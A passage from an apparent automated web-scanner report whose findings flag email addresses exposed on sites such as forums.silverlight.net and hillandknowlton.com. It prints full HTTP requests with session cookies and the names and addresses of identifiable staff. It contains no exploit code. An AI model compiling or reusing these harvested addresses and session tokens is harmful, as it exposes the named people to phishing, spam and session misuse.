Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:54 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:59 GMT; expires=Mon, 23-Apr-2012 15:56:59 GMT; path=/
Set-Cookie: CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; expires=Sun, 24-Apr-2011 16:16:59 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:56:59 GMT
Content-Length: 73658


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Instal
...[SNIP]...
<a href="/members/mtiede_4000_swtechnologies.com.aspx" title="mtiede@swtechnologies.com"><img class="post_img" src="http://i1.silverlight.net/avatar/mtiede@swtechnologies.com.jpg?forceidenticon=False&dt=634392429000000000&cdn_id=12152010" alt="mtiede@swtechnologies.com" />
...[SNIP]...
<a href="/members/mtiede_4000_swtechnologies.com.aspx">mtiede@swtechnologies.com</a>
...[SNIP]...

26.14. http://forums.silverlight.net/forums/17.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/17.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /forums/17.aspx HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:56:58 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:57:01 GMT; expires=Mon, 23-Apr-2012 15:57:01 GMT; path=/
Set-Cookie: CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; expires=Sun, 24-Apr-2011 16:17:02 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:01 GMT
Content-Length: 77618


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Progra
...[SNIP]...
<a href="/members/mtiede_4000_swtechnologies.com.aspx" title="mtiede@swtechnologies.com"><img class="post_img" src="http://i1.silverlight.net/avatar/mtiede@swtechnologies.com.jpg?forceidenticon=False&dt=634392429000000000&cdn_id=12152010" alt="mtiede@swtechnologies.com" />
...[SNIP]...
<a href="/members/mtiede_4000_swtechnologies.com.aspx">mtiede@swtechnologies.com</a>
...[SNIP]...

26.15. http://forums.silverlight.net/forums/TopicsNotAnswered.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.silverlight.net
Path:   /forums/TopicsNotAnswered.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /forums/TopicsNotAnswered.aspx?ForumID=-1 HTTP/1.1
Host: forums.silverlight.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=s4g33u45fgveyw55h3c01k45; CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:57:00 GMT; CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; omniID=d56272fa_cf2f_4cb1_a058_6b695009e628; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
ETag: ""
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 22 Apr 2011 08:37:02 GMT&mra=Sun, 24 Apr 2011 11:57:05 GMT; expires=Mon, 23-Apr-2012 15:57:05 GMT; path=/
Set-Cookie: CSAnonymous=10011676-3e60-473b-8d7d-50da5560d521; expires=Sun, 24-Apr-2011 16:17:05 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:05 GMT
Content-Length: 73491


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Thread
...[SNIP]...
<a href="/members/mtiede_4000_swtechnologies.com.aspx" title="mtiede@swtechnologies.com"><img class="post_img" src="http://i1.silverlight.net/avatar/mtiede@swtechnologies.com.jpg?forceidenticon=False&dt=634392429000000000&cdn_id=12152010" alt="mtiede@swtechnologies.com" />
...[SNIP]...
<a href="/members/mtiede_4000_swtechnologies.com.aspx">mtiede@swtechnologies.com</a>
...[SNIP]...

26.16. http://hillandknowlton.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hillandknowlton.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: hillandknowlton.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 01:29:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Set-Cookie: SESS5e4e256574068223638a5e6eb0172639=fnfjc11l0e5bqq3p1mcei2o0o7; expires=Wed, 18 May 2011 05:03:17 GMT; path=/; domain=.hillandknowlton.com
Last-Modified: Mon, 25 Apr 2011 00:54:49 GMT
ETag: "1d0be2322375aa0717fea3de5cf69722"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<me
...[SNIP]...
<img src="http://www.gravatar.com/avatar.php/562cfdef46c372ebd1656118ff5e8576?d=identicon&amp;s=20" alt="andrew.cuneo@hillandknowlton.com" title="andrew.cuneo@hillandknowlton.com" />
...[SNIP]...
<img src="http://www.gravatar.com/avatar.php/74ddd8ff524caad9290a3cbd2fa7e3f3?d=identicon&amp;s=20" alt="rowland.jack@hillandknowlton.com" title="rowland.jack@hillandknowlton.com" />
...[SNIP]...
<img src="http://www.gravatar.com/avatar.php/591dd41f85fae21cd5dda3b92721ce5b?d=identicon&amp;s=20" alt="annouchka.behrmann@hillandknowlton.com" title="annouchka.behrmann@hillandknowlton.com" />
...[SNIP]...
<img src="http://www.gravatar.com/avatar.php/6c7bc8783cedbe044a3d6e137e920bad?d=identicon&amp;s=20" alt="scott.mckenzie@hillandknowlton.com" title="scott.mckenzie@hillandknowlton.com" />
...[SNIP]...
<img src="http://www.gravatar.com/avatar.php/a6e721644c86853c91361b686deb9270?d=identicon&amp;s=20" alt="chris.pratt@hillandknowlton.com" title="chris.pratt@hillandknowlton.com" />
...[SNIP]...
<img src="http://www.gravatar.com/avatar.php/8be34ce520c742669d4231f8e837741b?d=identicon&amp;s=20" alt="david.chambers@hillandknowlton.com" title="david.chambers@hillandknowlton.com" />
...[SNIP]...
<img src="http://www.gravatar.com/avatar.php/74ddd8ff524caad9290a3cbd2fa7e3f3?d=identicon&amp;s=20" alt="rowland.jack@hillandknowlton.com" title="rowland.jack@hillandknowlton.com" />
...[SNIP]...

26.17. http://hillandknowlton.com/contacts/crisis  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hillandknowlton.com
Path:   /contacts/crisis

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contacts/crisis HTTP/1.1
Host: hillandknowlton.com
Proxy-Connection: keep-alive
Referer: http://hillandknowlton.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESS5e4e256574068223638a5e6eb0172639=0svmeo63fk7vqd56ajsdgm9cj6; has_js=1; __utmz=96094211.1303693048.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=96094211.1800674098.1303693048.1303693048.1303693048.1; __utmc=96094211; __utmb=96094211.1.10.1303693048; _jsuid=2446639594441985421; no_tracky=1

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 01:33:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Last-Modified: Mon, 25 Apr 2011 00:55:06 GMT
ETag: "12120cd440db8e20a077c9c293b31559"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<me
...[SNIP]...
<a href="mailto:glenn.schloss@hillandknowlton.com">
...[SNIP]...
<a href="mailto:jane.shapiro@hillandknowlton.ca">
...[SNIP]...
<a href="mailto:stuart.smith@hillandknowlton.com">
...[SNIP]...
<a href="mailto:marcelo.quiroga@hillandknowlton.com">
...[SNIP]...
<a href="mailto:crisis.help@hillandknowlton.com">crisis.help@hillandknowlton.com</a>
...[SNIP]...
<a href="mailto:chris.gidez@hillandknowlton.com">
...[SNIP]...

26.18. http://i1.iis.net/resources/third-party/omniture/omniture.combined.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i1.iis.net
Path:   /resources/third-party/omniture/omniture.combined.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /resources/third-party/omniture/omniture.combined.min.js?cdn_id=52867178000v1 HTTP/1.1
Host: i1.iis.net
Proxy-Connection: keep-alive
Referer: http://www.iis.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CSAnonymous=qiQvI5sCzAEkAAAAYmU0YTE1NTQtYjU0MC00NmM4LWIzNTgtYmI4NmU0OTdhYTI20

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 06 Jul 2010 16:03:40 GMT
Accept-Ranges: bytes
ETag: "056abcc241dcb1:0",""
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: public, max-age=26363671
Date: Sun, 24 Apr 2011 15:59:12 GMT
Connection: close
Content-Length: 23800

...var s_account = "msstoiisnet"; var omniGuidPath = "://www.iis.net/resources/third-party/omniture/analyticsid.aspx"; if (window.location.hostname.toLowerCase().indexOf("iis.net") == -1) { var s2 = s
...[SNIP]...
)`2'';@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s.b=s.
...[SNIP]...

26.19. http://i1.windowsclient.net/omniture/s_code_dotnet.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i1.windowsclient.net
Path:   /omniture/s_code_dotnet.js

Issue detail

The following email address was disclosed in the response:

Request

GET /omniture/s_code_dotnet.js?cdn_id={b4d0570c_v8} HTTP/1.1
Host: i1.windowsclient.net
Proxy-Connection: keep-alive
Referer: http://windowsclient.net/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Fri, 22 May 2009 05:38:00 GMT
Accept-Ranges: bytes
ETag: "06cb8779fdac91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: public, max-age=26364883
Date: Sun, 24 Apr 2011 15:58:12 GMT
Connection: close
Content-Length: 32031

/* SiteCatalyst code version: H.19
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************
*/
f
...[SNIP]...
;@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"
+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"
+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s
...[SNIP]...

26.20. http://i2.msdn.microsoft.com/Areas/Sto/Content/Scripts/mm/global.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i2.msdn.microsoft.com
Path:   /Areas/Sto/Content/Scripts/mm/global.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Areas/Sto/Content/Scripts/mm/global.js HTTP/1.1
Host: i2.msdn.microsoft.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A=I&I=AxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w!!&M=1; WT_NVR_RU=0=technet:1=:2=; MUID=B506C07761D7465D924574124E3C14DF; MC1=GUID=845eef4a7ff18745a494666b76292718&HASH=4aef&LV=20114&V=3; msdn=L=1033; ixpLightBrowser=0; omniID=1303134620609_e49b_0c9c_6cf1_45f64f5a5361; s_nr=1303567265614-New; _opt_vi_DANG4OLL=2A807526-0B45-4F67-8001-CE6244FF15CF; MSID=Microsoft.CreationDate=04/19/2011 11:23:33&Microsoft.LastVisitDate=04/23/2011 14:01:21&Microsoft.VisitStartDate=04/23/2011 13:49:08&Microsoft.CookieId=64491e77-08ce-4e1f-9bac-3648a81416de&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=6&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0253-8586-9443-3504; WT_FPC=id=173.193.214.243-2082981296.30145999:lv=1303556497823:ss=1303555133331; ADS=SN=175A21EF

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=1296000
ntCoent-Length: 168834
Content-Type: application/javascript
Last-Modified: Wed, 13 Apr 2011 22:12:06 GMT
Accept-Ranges: bytes
ETag: "f691dd327facb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 15:57:35 GMT
Connection: close
Content-Length: 168834

.../* * jQuery JavaScript Library v1.4.2 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the MIT or GPL Version 2 licenses. * http://jquery.org/license * * Includes Sizzle.js
...[SNIP]...
$4)#7=s.mr($C,(vt@tt`Zvt)`fs.hav()+q+(qs?qs:s.rq(^5)),0,id,ta);qs`g;`Rm('t')`5s.p_r)s.p_r(`I`a`g}^I(qs);^Q`u($3;`j$3`c^1,`G$O1',vb`I@M=^G=s.`Q`r=s.`Q^2=`H`m`g`5s.pg)`H^w@M=`H^weo=`H^w`Q`r=`H^w`Q^2`g`5!id@Vs.tc^ztc=1;s.flush`U()}`4#7`Ctl`0o,t,n,vo`2;s.@M=$Go`I`Q^2=t;s.`Q`r=n;s.t($3}`5pg){`H^wco`0o){`P^s\"_\",1,$8`4$Go)`Cwd^wgs`0u@v`P^sun,1,$8`4s.t()`Cwd^wdc`0u@v`P^sun,$8`4s.t()}}@8=(`H`M`k`9`3'@Os^y0`Id=^A;s
...[SNIP]...

26.21. http://i3.asp.net/umbraco-script/msc_all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i3.asp.net
Path:   /umbraco-script/msc_all.js

Issue detail

The following email address was disclosed in the response:

Request

GET /umbraco-script/msc_all.js?cdn_id=2011-04-12-001 HTTP/1.1
Host: i3.asp.net
Proxy-Connection: keep-alive
Referer: http://www.asp.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Pragma: public
Content-Type: application/x-javascript
Last-Modified: Fri, 01 Oct 2010 04:10:36 GMT
Accept-Ranges: bytes
ETag: "cf64ae991e61cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: public, max-age=53341167
Expires: Tue, 01 Jan 2013 01:00:00 GMT
Date: Sun, 24 Apr 2011 16:00:33 GMT
Connection: close
Content-Length: 38384

jQuery.fn.captcha=function(expiryUrl){var strFunc='$("'+this.selector+"\").attr('value', key);";$.get(expiryUrl,new Function("key",strFunc));};jQuery.fn.clientPaging=function(settings){var options=$.e
...[SNIP]...
'';@w=s.vs(sed)`5trk`F@w)#4=s.mr($1,(vt#Rt`avt)`n+"+"s.hav()+q+(qs?qs:s.rq(^4)),0,id,ta);qs`i;`Xm('t')`5s.p_r)s.p_r(`U`b`i}^G(qs);^b`t(@v;`p@v`M^2,`H$I1',vb`G''`5#F)`I^z$z=`I^zeo=`I^z`W`q=`I^z`W^c`i`5!id@Ss.tc@1tc=1;s.flush`T()}`2#4`9tl`0o,t,n,vo`1;@"+"X=$7o`U`W^c=t;s.`W`q=n;s.t(@v}`5pg){`I^zco`0o){`L^t\"_\",1,#U`2$7o)`9wd^zgs`0u$S`L^t#71,#U`2s.t()`9wd^zdc`0u$S`L^t#7#U`2s.t()}}@A=(`I`P`g`8`4$5s@p0`Ud=^9;s.b
...[SNIP]...

26.22. https://inter.viewcentral.com/events/cust/search_results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://inter.viewcentral.com
Path:   /events/cust/search_results.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /events/cust/search_results.aspx?cid=arcsight&cat3_id=16&pid=1&event_id=20&lid=1 HTTP/1.1
Host: inter.viewcentral.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ns4rhfqjuykp4mngwvyxv1yx; VCInter=2399469578.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: VCInter=2399469578.20480.0000; path=/
Date: Sun, 24 Apr 2011 20:28:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
X-AspNet-Version: 1.1.4322
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 31905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script language="javascript">


function getCookieVal (offset) {
var
...[SNIP]...
<a href="mailto:arst-education@hp.com">
...[SNIP]...
<a href="mailto:education@arcsight.com">
...[SNIP]...

26.23. http://kroogy.com/search/js/ColorPicker2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/js/ColorPicker2.js

Issue detail

The following email address was disclosed in the response:

Request

GET /search/js/ColorPicker2.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: kroogy.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:35:10 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 15 Apr 2011 19:11:36 GMT
ETag: "8101b1-399c-4a0f9cf88ea00"
Accept-Ranges: bytes
Vary: Accept-Encoding
X-Powered-By: PleskLin
Connection: close
Content-Type: application/x-javascript
Content-Length: 14748


// ===================================================================
// Author: Matt Kruse <matt@mattkruse.com>
// WWW: http://www.mattkruse.com/
//
// NOTICE: You may use this code for any purpos
...[SNIP]...

26.24. http://kroogy.com/search/js/prototype.lite.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kroogy.com
Path:   /search/js/prototype.lite.js

Issue detail

The following email address was disclosed in the response:

Request

GET /search/js/prototype.lite.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: kroogy.com

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:36:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 15 Apr 2011 19:11:40 GMT
ETag: "8101b5-d07-4a0f9cfc5f300"
Accept-Ranges: bytes
Vary: Accept-Encoding
X-Powered-By: PleskLin
Connection: close
Content-Type: application/x-javascript
Content-Length: 3335

/* Prototype JavaScript framework
* (c) 2005 Sam Stephenson <sam@conio.net>
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototype web sit
...[SNIP]...

26.25. http://krypt.com/js/cart.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://krypt.com
Path:   /js/cart.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/cart.js HTTP/1.1
Host: krypt.com
Proxy-Connection: keep-alive
Referer: http://krypt.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:34:32 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Content-Type: text/javascript
Content-Length: 12245

// $Id: cart.js 4849 2011-03-09 23:03:37Z jrlenz $

var cf_Posting = false;

function cart_Clear() {
   jConfirm("<strong>This can not be undone!</strong><br />Are you <strong>SURE</strong> you want to
...[SNIP]...
<br />Please contact sales@krypt.com to place your order.", function(r) {
                       window.location = 'http://www.krypt.com/contact/';
                   });
               } else {
                   cf_Posting = false;
               }
           }
       }
   );
}
function cart_ErrAlert(fields) {
   var
...[SNIP]...
<a href="mailto:sales@krypt.com">sales@krypt.com</a>
...[SNIP]...

26.26. https://login.live.com/login.srf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.live.com
Path:   /login.srf

Issue detail

The following email address was disclosed in the response:

Request

GET /login.srf?wa=wsignin1.0&rpsnv=11&ct=1303660392&rver=6.0.5276.0&wp=LBI_SSL&wreply=https:%2F%2Flogin.silverlight.net%2Flogin%2Fcreateuser.aspx%3Freturnurl%3Dhttp:%2F%2Fwww.silverlight.net%2Fdefault.aspx&lc=1033&id=265631 HTTP/1.1
Host: login.live.com
Connection: keep-alive
Referer: https://login.silverlight.net/login/createuser.aspx?returnurl=http%3a%2f%2fwww.silverlight.net%2fdefault.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Sample=1; MUID=B506C07761D7465D924574124E3C14DF; wlidperf=throughput=13&latency=225; wla42=; LD=9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_00381e4a312_15501_1303568379549=L2450|U7591047&9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_0046b7cd8dc_15501_1303568381496=L1240|U7589087&9e2cdbc6-b027-4dee-afdd-bbf9e92105a3_0018fbb5ebe_15501_1303567265251=U8722104

